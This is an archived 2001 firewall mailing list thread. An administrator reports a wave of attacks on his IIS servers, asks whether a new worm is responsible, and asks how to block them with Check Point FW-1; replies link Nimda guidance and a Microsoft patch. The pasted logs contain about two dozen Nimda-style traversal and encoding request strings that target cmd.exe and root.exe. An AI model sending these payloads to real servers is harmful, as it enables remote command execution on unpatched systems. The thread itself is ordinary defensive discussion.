NETWORK PRESENCE ABOUT SERVICES PRODUCTS TRAINING CONTACT US SEARCH SUPPORT
 


Search
display results
words begin  exact words  any words part 

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

AW: [FW1] New worm on the road?



hi patrick,
at this link is a descripiton to create a resource to block nimda
http://www.checkpoint.com/nimda.html
http://support.checkpoint.com/public/nimda_solution.html

:-)
peter


> -----Ursprüngliche Nachricht-----
> Von:	Allison, Mark [SMTP:[email protected]]
> Gesendet am:	Mittwoch, 19. September 2001 17:05
> An:	'Patrick Coomans'
> Cc:	'[email protected]'
> Betreff:	RE: [FW1] New worm on the road?
> 
> A patch was released from Microsoft in October 2000.  Follow the Symantic
> link below.
> <http://www.symantec.com/avcenter/venc/data/[email protected]>
> 
> Mark Allison 
> Global Cash Access / Central Credit, L.L.C. 
> [mailto:[email protected]] 
> 
> 	-----Original Message-----
> 	From: Patrick Coomans [mailto:[email protected]]
> 	Sent: Tuesday, September 18, 2001 2:36 PM
> 	To: [email protected]
> 	Subject: [FW1] New worm on the road?
> 	
> 	
> 	Since this evening I am experiencing massive attacks on HTTP (IIS
> oriented I presume) from many different IP addresses.
> 	 
> 	They all look like:
> 	 
> 	GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 	GET /scripts/root.exe?/c+dir HTTP/1.0
> 	GET /MSADC/root.exe?/c+dir HTTP/1.0
> 	GET /MSADC/root.exe?/c+dir HTTP/1.0
> 	GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 	GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 	GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 	GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> system32/cmd.exe?/c+dir HTTP/1.0
> 	GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> system32/cmd.exe?/c+dir HTTP/1.0
> 	GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 	
> 	 
> 	Is anyone aware that this is some new kind of worm?
> 	Now my FW1 question: can I create a HTTP resource (secure server)
> that blocks all requests that e.g. have a .EXE in it ?  Or would that slow
> my FW1's down to much?
> 	 
> 	Any other suggestions for good products that can do HTTP content
> inspection and that cooperate or can co-exist with fw1 ?
> 	 
> 	 
> 	Thanks,
> 	Patrick
> 	 
> 


================================================================================
     To unsubscribe from this mailing list, please see the instructions at
               http://www.checkpoint.com/services/mailing.html
================================================================================



 
----------------------------------

ABOUT SERVICES PRODUCTS TRAINING CONTACT US SEARCH SUPPORT SITE MAP LEGAL
   All contents © 2004 Network Presence, LLC. All rights reserved.